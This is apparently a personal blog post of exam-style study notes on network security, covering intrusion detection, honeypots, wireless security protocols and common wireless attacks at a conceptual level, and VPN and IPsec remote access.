3. Advanced Network Security

 

  • IDSIntrusion Detection Systems & IPS
    • Typically only detect and notify, though some active IDS can take steps to block attacks
    • Either detect predefined attack signatures or note anomalous behavior
      • Anomaly-based first establishes a baseline of normal operation, and notes when it changes
      • Anomaly-based is good at detecting zero-day issues that haven’t been identified yet
      • Anomaly-based requires regular updating of baseline after system or network changes in order to remain accurate
    • HIDS – Host Based
      • Installed on individual servers or workstations
      • Primarily monitors traffic through NIC
      • Many now also monitor application activity on a system
      • HIDS can identify malware that some antivirus would miss
        • Many organizations install a HIDS and antivirus on every workstation
      • NIDS – Network Based
        • Installed on network devices like routers or firewalls
        • Installed on network devices but report to central monitoring server with a NIDS consol
        • NIDS don’t detect anomalies on individual hosts unless they’re dire, and cannot decrypt data
        • Mostly analyze larger network trends and plaintext transmissions
        • You can place NIDS sensors at different points in a network configuration to detect different kinds of issues, such as what attempts are made vs. what attempts get through the firewall
      • Passive IDS logs an alert and may notify personnel
      • Active IDS logs and notifies personnel, but also changes the rules of the environment accordingly
      • An IPS is always placed in-line with traffic so it can prevent the success of an attack
      • IDS and IPS utilize packet sniffing for info gathering
        • Physical sniffing requires being plugged in
        • Wireless sniffing can intercept over the air
      • SYN Flood Attack
        • Example of DoS
        • Repeatedly sends the initial Syn packet in a handshake, but never sends the final ack
        • All of these incomplete sessions drain resources until the server crashes, or the server begins denying legitimate connections
        • IDS and IPS can detect these attacks, and many firewalls include a flood guard that will detect the attacks and close the open sessions
      • Honeypots
        • Utilize basic security to offer a tantalizing vulnerability
        • Typically filled with bogus data and fake transactions
        • Good way to gather info on an attacker
        • Two Goals: Distract, and Analyze
        • Honeynet
          • Virtualized servers that work like a live network
          • Even more tantalizing and distracting
          • Provides more time to assess the attacker
        • Don’t Counterattack
          • Attackers have more time than you, and possibly more skill than you. Don’t piss them off
          • You also run the risk of attacking a fellow victim, rather than the attacker himself
        • Using Multiples NIPS
          • You can put NIPS 1 between the internet and the local web/mail servers
          • NIPS 2 goes between those servers and another batch of internal private network.
          • This means that if malware sneaks past the first wall, it can’t launch attacks directly at everything- it’s cordoned off.
          • Advance Persistent Threats (APTS)
          • RATs (Remote Access Tools)

Securing WLAN

Misc Wireless Principles

  • Antennas
    • Isotropic
      • Theoretical perfect 360 horizontal/vertical spread
      • Most omnidirectional antennas try to emulate this
    • Dipole
      • Most common, 360 horizon, 75 vertically
      • Looks like a normal pencil antenna
    • Yagi
      • Dipole antenna with additional director element
    • dBi/dBd indicate the gain of the antenna based on its physical characteristics
    • dBm indicates the power level of the WAP and can be adjusted
    • Not all WAPS are routers, some just allow access to the network
    • Users want good coverage, administrators want low coverage for security
    • Lol most of this can be thwarted by throwing a can around an antenna to make a long range antenna
  • Security Protocolse
    • WEP
    • WPA
    • WPA2 – IEEE 802.11i
      • Wi-fi Alliance requires all Wi-Fi Certified devices to meet WPA2 standards
      • This includes Counter Mode with Cipher Block Chaining Message Authentication Code Procotol (CCMP)
      • WPA2 has theoretically been cracked, but a 20 character complex key should work.
    • Authentication with Enterprise Mode
    • TKIP v CCMP
      • Temporal Key Integrity Protocol TKIP was used with WPA before CCMP
      • Each packet in TKIP gets a new key, making it more secure than WEP
      • Some WPA security uses AES instead of TKIP, which is pretty secure, so on hardware that only supports WPA it can be a solution
    • 11x in implemented as a RADIUS or Diameter server, and can be used with WPA or WPA2 using enterprise mode
      • WPA/WPA2 in personal mode just use a pre-shared key, which doesn’t authenticate.
      • Enterprise mode authenticates users, who have individual sign-ons and passkeys
      • RADIUS uses port 1812, but occasionally 1645
    • EAP – A system to create a secure encryption key, known as PMK – Pairwise Master Key.
      • Used by both TKIP and AES-based CCMP
    • PEAP – Encapsulates and encrypts the EAP conversation in a TLS tunnel
      • MSCHAPv2 uses this
      • Requires certificate on server, but not on clients
    • EAP-TTLS – Allows older authentication methods such as PAP within a TLS tunnel
    • EAP-TLS – Most secure EAP standards and widely used. Requires certificates on the 802.1x server and each client.
    • Lightweight EAP (LEAP) – Modified version of CHAP. Doesn’t require digital certificate, and less secure.
    • Small device security
      • WTLS – Wireless Transport Layer Security
      • ECC – Elliptic Curve Cryptography
    • Captive Portals
      • Those annoying websites that make you sign into the network.
    • Hotspots with Isolation Mode
      • Isolation mode prevents people from accessing or sharing data across a network. This is good to provide users with internet access in an unsecured fashion
    • Mac Filtering
      • Limit wireless access to specific Mac addresses
      • This isn’t that useful, as sniffers can spoof their mac address to an allowed one
    • Wireless Attacks
      • War driving
      • War Biking
        • Security guy went around with an unsecured hotspot to collect user data. In two days, 2900 people logged into it.
        • He found most used unsecured wireless that he could easily impersonate
      • There’s no reason to disable SSID as anyone who cares can figure it out easily
        • You can at least hide it from casuals
      • WEP/WPA attacks
        • WEP uses the RC4 stream cipher and reuses encryption keys, so its easy to find that key and gain full access
        • IV attacks
          • The encryption key is created by combining the WEP with an IV -initialization vector. But this IV is sent to the client in plaintext
          • This IV range is limited, and easily cracked
          • Packet injection (making it send more response packets) can make cracking take less than a minute
        • WPA Cracking
          • 1, Use a wireless sniffer to capture wireless packets
          • 2, Wait for client to authenticate, and steal the encrypted passphrase
          • 3, Use a brute force attack, offline the user can break the encryption on that passphrase and then go back online once they have that passphrase
          • If nobody is active on a wireless, it can’t be cracked. But if someone is active, the attacker can disconnect someone and steal the encrypted passkey when they try to reconnect.
        • WPS cracking
          • Super easy. The pin can be guessed in ten hours
        • Rogue Access Points
          • A WAP placed by an attacker meant to look friendly
        • Evil Twin
          • A WAP meant to impersonate a friendly WAP
        • Near-Field Communication
        • Bluetooth Jacking
          • Don’t let someone connect to you while in discovery mode
          • Bluejacking – Sending unsolicited messages to a device over bluetooth
          • Bluesnarfing – Data theft over bluetooth
          • Bluebugging – Taking over a device through bluetooth to log phone conversations, forward calls, send messages, etc

Remote Access

  • Dial-up RAS
    • Uses POTS and modems and PPP
    • Not secure if lines are tapped
  • VPN and VPN Concentrators
    • VPN Concentrators, often housed on VPN servers, provide all the tools required to run the VPN, including encryption and authentication.
    • VPNs allow you to run tunnels through public spheres to logically separate and secure traffic.
    • IPsec and VPN
      • IPsec offers both Tunnel Mode and Transport Mode
      • Tunnel Mode is used with VPN, and encapsulates the entire IP packet
      • Transport Mode only encrypts the payload and is more efficient in private networks
      • IPsec also uses ESP (Encapsulating Security Payload) to encrypt data and provide confidentiality. ESP uses protocol ID 50
      • IPsec uses the IKE (Internet Key Exchange) Protocol over port 500.
        • Between the PID and that port, there are lots of ways to customize ACL rules regarding IPsec
      • L2TP is a good tunneling protocol, but does not encrypt data. IPsec can work in conjunction with L2TP for a very good tunnel
      • IPsec and NAT issues
        • NAT and IPsec are incompatible
        • Instead of IPsec, you can use tunneling protocols that rely on SSL or TLS
        • SSTP – Secure Socket Tunneling Protocol encrypts VPN traffic over SSL using port 443
          • OpenVPN and OpenConnect are similar programs that use TLS
        • PPTP – Point To Point Tunnelling Protocol
          • Uses Microsoft’s encryption
          • Unused today because of known vulnerabilities
          • Uses TCP Port 1723
        • Site-to-Site VPN
          • Uses two VPN servers in different locations to form gateways
          • From user end, its as if there’s a single network
          • Can be slow
        • VPN over Open Wireless
          • Two easy methods to secure yourself over open wireless
          • HTTPS connections only
          • Apps like Private Internet Access or TunnelBear that provide VPN services over open wifi
        • NAC – Network Access Control is essential on VPNs, because Admins lack complete control over home user computers, so they need to be able to restrict data and traffic somehow
          • Health and Control
            • Systems can be assigned health status based on how updated their antivirus definitions are, how updated their OS is, and the status of their personal firewall
            • When a client accesses a VPN, an authentication or health agent queries the status of that client
            • If the client doesn’t meet health standards, they can be put on a quarantine network including resources to upgrade the health of that client
            • For local clients, this may mean they have internet access, but cannot communicate with other devices on the network
Advertisements
Advertisements

I post all things that interest me. Mainly computers.

%d bloggers like this: